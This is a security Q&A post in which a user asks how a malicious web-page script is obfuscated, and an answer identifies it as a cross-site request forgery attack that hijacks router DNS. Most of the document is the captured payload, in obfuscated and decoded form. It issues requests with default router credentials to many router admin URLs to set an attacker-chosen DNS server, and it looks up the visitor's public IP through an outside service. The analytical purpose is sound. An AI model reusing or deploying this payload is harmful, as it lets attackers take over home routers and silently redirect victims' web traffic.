# What kind of encryption or obfuscation is this?

Tags: encryption, javascript, dns, router, obfuscation

I found this script on a web page who attempted to change my router's DNS configuration. 
But I can't understant what kind of encryption or obfuscation is used.

Here, a sample of the code on the page:

```
<script language=JavaScript> valor='%252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252525252520var%2525252525225525252525252525252525252525252525252520dnsprimario%2525252525252525252525252522525252525252525252525252525252525252525252525252525252525252525252525252552525252525252525252525252525252525252525252
```

I replaced all the '25' by '' and I get this:

```
<script language=JavaScript>
valor='%20var%20dnsprimario%20%3D%20%22103.31.0.140%22%3B%0A%20%20%20%20var%20dnssecundario%20%3D%20%228.8.8.8%22%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@10.1.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//192.168.0.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//10.1.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//192.168.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//root%3Aroot@83.142.155.209/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@83.142.155.209/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//184.170.140.162/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//user%3Auser@192.168.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@10.1.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//10.0.0.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@10.0.0.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Agvt12345@83.142.155.209/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Agvt12345@192.168.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Agvt12345@192.168..1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%22%20height%3D1%20width%3D1%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm%3Fwantype%3DDynamic+IP%26hostName%3D%26mtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26Save%3DSave%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm%3Fwan%3D0%26wantype%3D0%26mtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26hostName%3D%26flagMode%3D2%26Save%3DSave%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm%3Fmtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26Save%3DSave%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm%3Fmtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26Save%3DSave%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanStaticIpCfgRpm.htm@wan%3D0%26wantype%3D1%26ip%3D0.0.0.0%26mask%3D0.0.0.0%26gateway%3D0.0.0.0%26mtu%3D1500%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26Save%3DSave%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//192.168.1.1/userRpm/PPPoECfgAdvRpm.htm%3Fwan%3D0%26lcpMru%3D1480%26ServiceName%3D%26AcName%3D%26EchoReq%3D0%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26downBandwidth%3D0%26upBandwidth%3D0%26Save%3D%26Advanced%3DAdvanced%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//192.168.2.1/userRpm/PPPoECfgAdvRpm.htm%3Fwan%3D0%26lcpMru%3D1480%26ServiceName%3D%26AcName%3D%26EchoReq%3D0%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26downBandwidth%3D0%26upBandwidth%3D0%26Save%3D%26Advanced%3DAdvanced%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@http%3A//192.168.1.1/userRpm/PPPoECfgAdvRpm.htm%3Fwan%3D0%26lcpMru%3D1480%26ServiceName%3D%26AcName%3D%26EchoReq%3D0%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26downBandwidth%3D0%26upBandwidth%3D0%26Save%3D%20%26Advanced%3DAdvanced%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm%3Fwan%3D0%26wantype%3D0%26mtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26hostName%3DTLINK%26Save%3DSave%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.4/userRpm/WanDynamicIpCfgRpm.htm%3Fwan%3D0%26wantype%3D0%26mtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26hostName%3DTLINK%26Save%3DSave%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@192.168.1.1/start_apply.htm%3Fwan_dns1_x%3D%27+dnsprimario+%27%26wan_dns2_x%3D%27+dnssecundario+%27%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3Aadmin%3Aadmin@192.168.1.2/start_apply.htm%3Fwan_dns1%3D%27+dnsprimario+%27%26wan_dns2%3D%27+dnssecundario+%27%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3Aadmin%3Aadmin@192.168.2.2/start_apply.htm%3Fwan_dns1%3D%27+dnsprimario+%27%26wan_dns2%3D%27+dnssecundario+%27%20%3E%27%29%3B%20%20%20%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Apassword@192.168.1.1/start_apply.htm%3Fdnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%20%3E%27%29%3B%20%0A%20%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//admin%3Aadmin@192.168.1.1/prim.htm%3F_scb%3D0%26_ccb%3D0%26N00010003%3D0x00%26_cce%3D0x80010008%26_ccb%3D0x80010009%26S00035002%3D%26N001E000D%3D%26_cce%3D0x80010009%26_ccb%3D0x80010009%26_start_0000%3D%26I00110001%3D%26I00110002%3D%26I00110003%3D%26I00110004%3D%26I00110005%3D%26N00110009%3D1500%26_start_0100%3D%26I00035007%3D%27+dnsprimario+%27%26I00035008%3D%27+dnssecundario+%27%26N00035009%3D1500%26_sce%3D%Nsc0%26B0001000F%3D%26_sce%3D%Nsc1%26N0003500E%3D1%26S00040100%3D%26S00040200%3D%26_S00040200%3D%26S00040600%3D%26I00040300%3D%26I00040700%3D%26I00040800%3D%26N00040A00%3D1492%26N00040912%3D1%26N00050E00%3D1%26I00050300%3D%26I00050400%3D%26I00050500%3D%26S00050600%3D%26S00050100%3D%26S00050200%3D%26_S00050200%3D%26N00050911%3D1%26N00060E00%3D1%26I00060300%3D%26I00060400%3D%26I00060500%3D%26S00060600%3D%26S00060100%3D%26S00060200%3D%26_S00060200%3D%26N00060002%3D1%26N001E0015%3D2%26N001E002B%3D0%26S00201200%3Dvivo%26S001E0001%3Dvivo%26S001E0002%3D*****%26_S001E0002%3D*****%26S001E0005%3D*99%23%26N001E000F%3D1%26S001E0003%3Dzap.vivo.com.br%26S001E0004%3D%26N001E0032%3D1%26I001E0008%3D%26I001E0009%3D%26N001E0010%3D0%26N001E0020%3D%26N001E0090%3D0%26N001E0017%3D%26_end_0500%3D%26_cce%3D0x80010009%26_sce%3D%Ssc%29%3B%3C/style%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//admin%3Aadmin@192.168.0.1/prim.htm%3F_scb%3D0%26_ccb%3D0%26N00010003%3D0x00%26_cce%3D0x80010008%26_ccb%3D0x80010009%26S00035002%3D%26N001E000D%3D%26_cce%3D0x80010009%26_ccb%3D0x80010009%26_start_0000%3D%26I00110001%3D%26I00110002%3D%26I00110003%3D%26I00110004%3D%26I00110005%3D%26N00110009%3D1500%26_start_0100%3D%26I00035007%3D%27+dnsprimario+%27%26I00035008%3D%27+dnssecundario+%27%26N00035009%3D1500%26_sce%3D%Nsc0%26B0001000F%3D%26_sce%3D%Nsc1%26N0003500E%3D1%26S00040100%3D%26S00040200%3D%26_S00040200%3D%26S00040600%3D%26I00040300%3D%26I00040700%3D%26I00040800%3D%26N00040A00%3D1492%26N00040912%3D1%26N00050E00%3D1%26I00050300%3D%26I00050400%3D%26I00050500%3D%26S00050600%3D%26S00050100%3D%26S00050200%3D%26_S00050200%3D%26N00050911%3D1%26N00060E00%3D1%26I00060300%3D%26I00060400%3D%26I00060500%3D%26S00060600%3D%26S00060100%3D%26S00060200%3D%26_S00060200%3D%26N00060002%3D1%26N001E0015%3D2%26N001E002B%3D0%26S00201200%3Dvivo%26S001E0001%3Dvivo%26S001E0002%3D*****%26_S001E0002%3D*****%26S001E0005%3D*99%23%26N001E000F%3D1%26S001E0003%3Dzap.vivo.com.br%26S001E0004%3D%26N001E0032%3D1%26I001E0008%3D%26I001E0009%3D%26N001E0010%3D0%26N001E0020%3D%26N001E0090%3D0%26N001E0017%3D%26_end_0500%3D%26_cce%3D0x80010009%26_sce%3D%Ssc%29%3B%3C/style%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//admin@192.168.1.1/prim.htm%3F_scb%3D0%26_ccb%3D0%26N00010003%3D0x00%26_cce%3D0x80010008%26_ccb%3D0x80010009%26S00035002%3D%26N001E000D%3D%26_cce%3D0x80010009%26_ccb%3D0x80010009%26_start_0000%3D%26I00110001%3D%26I00110002%3D%26I00110003%3D%26I00110004%3D%26I00110005%3D%26N00110009%3D1500%26_start_0100%3D%26I00035007%3D%27+dnsprimario+%27%26I00035008%3D%27+dnssecundario+%27%26N00035009%3D1500%26_sce%3D%Nsc0%26B0001000F%3D%26_sce%3D%Nsc1%26N0003500E%3D1%26S00040100%3D%26S00040200%3D%26_S00040200%3D%26S00040600%3D%26I00040300%3D%26I00040700%3D%26I00040800%3D%26N00040A00%3D1492%26N00040912%3D1%26N00050E00%3D1%26I00050300%3D%26I00050400%3D%26I00050500%3D%26S00050600%3D%26S00050100%3D%26S00050200%3D%26_S00050200%3D%26N00050911%3D1%26N00060E00%3D1%26I00060300%3D%26I00060400%3D%26I00060500%3D%26S00060600%3D%26S00060100%3D%26S00060200%3D%26_S00060200%3D%26N00060002%3D1%26N001E0015%3D2%26N001E002B%3D0%26S00201200%3Dvivo%26S001E0001%3Dvivo%26S001E0002%3D*****%26_S001E0002%3D*****%26S001E0005%3D*99%23%26N001E000F%3D1%26S001E0003%3Dzap.vivo.com.br%26S001E0004%3D%26N001E0032%3D1%26I001E0008%3D%26I001E0009%3D%26N001E0010%3D0%26N001E0020%3D%26N001E0090%3D0%26N001E0017%3D%26_end_0500%3D%26_cce%3D0x80010009%26_sce%3D%Ssc%29%3B%3C/style%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//admin@192.168.0.1/prim.htm%3F_scb%3D0%26_ccb%3D0%26N00010003%3D0x00%26_cce%3D0x80010008%26_ccb%3D0x80010009%26S00035002%3D%26N001E000D%3D%26_cce%3D0x80010009%26_ccb%3D0x80010009%26_start_0000%3D%26I00110001%3D%26I00110002%3D%26I00110003%3D%26I00110004%3D%26I00110005%3D%26N00110009%3D1500%26_start_0100%3D%26I00035007%3D%27+dnsprimario+%27%26I00035008%3D%27+dnssecundario+%27%26N00035009%3D1500%26_sce%3D%Nsc0%26B0001000F%3D%26_sce%3D%Nsc1%26N0003500E%3D1%26S00040100%3D%26S00040200%3D%26_S00040200%3D%26S00040600%3D%26I00040300%3D%26I00040700%3D%26I00040800%3D%26N00040A00%3D1492%26N00040912%3D1%26N00050E00%3D1%26I00050300%3D%26I00050400%3D%26I00050500%3D%26S00050600%3D%26S00050100%3D%26S00050200%3D%26_S00050200%3D%26N00050911%3D1%26N00060E00%3D1%26I00060300%3D%26I00060400%3D%26I00060500%3D%26S00060600%3D%26S00060100%3D%26S00060200%3D%26_S00060200%3D%26N00060002%3D1%26N001E0015%3D2%26N001E002B%3D0%26S00201200%3Dvivo%26S001E0001%3Dvivo%26S001E0002%3D*****%26_S001E0002%3D*****%26S001E0005%3D*99%23%26N001E000F%3D1%26S001E0003%3Dzap.vivo.com.br%26S001E0004%3D%26N001E0032%3D1%26I001E0008%3D%26I001E0009%3D%26N001E0010%3D0%26N001E0020%3D%26N001E0090%3D0%26N001E0017%3D%26_end_0500%3D%26_cce%3D0x80010009%26_sce%3D%Ssc%29%3B%3C/style%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//admin%3Aadmin@192.168.0.1/userRpm/WanDynamicIpCfgRpm.htm%3Fwan%3D0%26wantype%3D0%26mtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26hostName%3DTLINK%26Save%3DSave%29%3B%3C/style%3E%27%29%3B%0A%20%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//admin%3Aadmin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm%3Fwan%3D0%26wantype%3D0%26mtu%3D1500%26manual%3D2%26dnsserver%3D%27+dnsprimario+%27%26dnsserver2%3D%27+dnssecundario+%27%26hostName%3DTLINK%26Save%3DSave%29%3B%3C/style%3E%27%29%3B%0A%20%20%20%20function%20CapturarIP%28%29%20%7B%20%20%0A%20%20%20%20if%20%28window.XMLHttpRequest%29%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%20%20%0A%20%20%20%20else%20xmlhttp%20%3D%20new%20ActiveXObject%28%22Microsoft.XMLHTTP%22%29%3B%20%20%0A%20%20%0A%20%20%20%20xmlhttp.open%28%22GET%22%2C%22http%3A//api.hostip.info/get_html.php%22%2Cfalse%29%3B%20%20%0A%20%20%20%20xmlhttp.send%28%29%3B%20%20%0A%20%20%0A%20%20%20%20hostipInfo%20%3D%20xmlhttp.responseText.split%28%22%5Cn%22%29%3B%20%20%0A%20%20%0A%20%20%20%20for%20%28i%3D0%3B%20hostipInfo.length%20%3E%3D%20i%3B%20i++%29%20%7B%20%20%0A%20%20%20%20%20%20%20%20ipAddress%20%3D%20hostipInfo%5Bi%5D.split%28%22%3A%22%29%3B%20%20%0A%20%20%20%20%20%20%20%20if%20%28%20ipAddress%5B0%5D%20%3D%3D%20%22IP%22%20%29%20return%20ipAddress%5B1%5D%3B%20%20%0A%20%20%20%20%7D%20%20%0A%20%20%0A%20%20%20%20return%20false%3B%20%20%0A%20%20%20%20%7D%0A%0A%0Avar%20ip%20%3D%20CapturarIP%28%29%3B%0A%20%20%20document.write%28%27%3Cstyle%20type%3D%22text/css%22%3E@import%20url%28http%3A//%27+ip+%27/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRefresh%3D1%29%3B%3C/style%3E%27%29%3B%0A%3C/script%3E%0A%3Cscript%20language%3DJavaScript%3E%0A%20%20%20%20var%20dnsprimario%20%3D%20%22103.31.0.140%22%3B%0A%20%20%20%20var%20dnssecundario%20%3D%20%228.8.8.8%22%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@10.1.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRef%0A%0A//jsunpack.url%20var%20newurl%20%3D%20%3Cscript%20language%3DJavaScript%3E%0A%20%20%20%20var%20dnsprimario%20%3D%20%22103.31.0.140%22%3B%0A%20%20%20%20var%20dnssecundario%20%3D%20%228.8.8.8%22%3B%0A%20%20%20%20document.write%28%27%3Cimg%20src%3D%22http%3A//admin%3Aadmin@10.1.1.1/dnscfg.cgi%3FdnsPrimary%3D%27+dnsprimario+%27%26dnsSecondary%3D%27+dnssecundario+%27%26dnsDynamic%3D0%26dnsRef';document.write('<'+'script>'+unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(unescape(valor))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))+'</s'+'cript>')
```

What kind of obfuscation or encryption is it? Is there a way to decrypt the original script and remove all the '25' and Url encoded characters?

Comment: You already know what the exploit does, and your only query is around identifying the type of encryption, and that is off topic here. As well as there not actually being any encryption here...

Comment: I Want to know what kind of (encryption or obfuscation) was used in this code. I just know what this does because when I removed all de '25' characters I was able to read what he does partialy

Comment: And that question is off topic here, sorry.

Comment: @lwb This question could be made on-topic if you rephrased it. DNS hijacking is well within the realm of infosec.

Answer (score 4, accepted):

### This is a [Cross-Site Request Forgery](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) *attempt*.

This Cross-Site Request Forgery attack attempts to exploit your router using the most common default user/pass combos and change your DNS servers to another:

```
 var dnsprimario = "103.31.0.140";
 var dnssecundario = "8.8.8.8";
 document.write('<img src="hxxp://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://192.168.0.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://10.1.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://192.168.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://root:root@83.142.155.209/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:admin@83.142.155.209/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://184.170.140.162/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://admin:admin@192.168.1.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
 document.write('<img src="hxxp://10.0.0.1/dnscfg.cgi?dnsPrimary=' + dnsprimario + '&dnsSecondary=' + dnssecundario + '&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
